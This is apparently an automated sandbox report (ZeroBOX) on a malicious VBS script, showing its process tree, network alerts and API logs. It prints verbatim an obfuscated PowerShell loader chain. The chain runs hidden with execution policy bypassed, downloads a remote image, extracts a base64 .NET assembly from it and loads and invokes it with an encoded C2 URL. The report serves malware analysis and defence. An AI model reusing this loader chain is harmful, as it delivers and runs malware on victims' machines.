Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 19, 2023, 6:25 p.m.	Oct. 19, 2023, 6:27 p.m.

Size	148.6KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`a19e87eb4cfc892ad7ccf43fd3a2a114`
SHA256	`ee92ab3aadc49e54ea8704bdc23967275fd2f96ef674f180b655c470b561f885`
CRC32	`D1989449`
ssdeep	`3072:ifbhiB+Mf3VC88888P88888O88888d88888X88888C88888a88888n8888wJ888/:OhK+Uc`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\westartagain.vbs
3052
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2184
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
    2348

Name	Response	Post-Analysis Lookup
wallpapercave.com	A 104.22.53.71 A 104.22.52.71 A 172.67.29.26	172.67.29.26

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.29.26	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 172.67.29.26:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 172.67.29.26:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 19, 2023, 6:25 p.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 6:25 p.m.			0	0

Command line console output was observed (50 out of 139 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: At line:1 char:142 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-O console_handle: 0x00000047	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData <<<< ($imageUr console_handle: 0x00000053	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: l);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.Index console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Of($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and console_handle: 0x00000077	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end console_handle: 0x00000083	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'd console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: fdf' , 'dfdf' , 'dadsa' , 'de' , 'cu')) console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x00000103	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Parameter name: bytes" console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: At line:1 char:205 console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-O console_handle: 0x00000127	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$im console_handle: 0x00000133	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ageText = [System.Text.Encoding]::UTF8.GetString <<<< ($imageBytes);$startFlag console_handle: 0x0000013f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.Index console_handle: 0x0000014b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Of($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and console_handle: 0x00000157	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end console_handle: 0x00000163	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L console_handle: 0x0000016f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load console_handle: 0x0000017b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA console_handle: 0x00000187	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o console_handle: 0x00000193	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'd console_handle: 0x0000019f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: fdf' , 'dfdf' , 'dadsa' , 'de' , 'cu')) console_handle: 0x000001ab	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001b7	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001c3	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000001e3	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: At line:1 char:311 console_handle: 0x000001ef	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-O console_handle: 0x000001fb	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$im console_handle: 0x00000207	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<B console_handle: 0x00000213	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf <<< console_handle: 0x0000021f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: < ($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and console_handle: 0x0000022b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end console_handle: 0x00000237	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L console_handle: 0x00000243	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load console_handle: 0x0000024f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA console_handle: 0x0000025b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o console_handle: 0x00000267	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: bject[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'd console_handle: 0x00000273	1	1
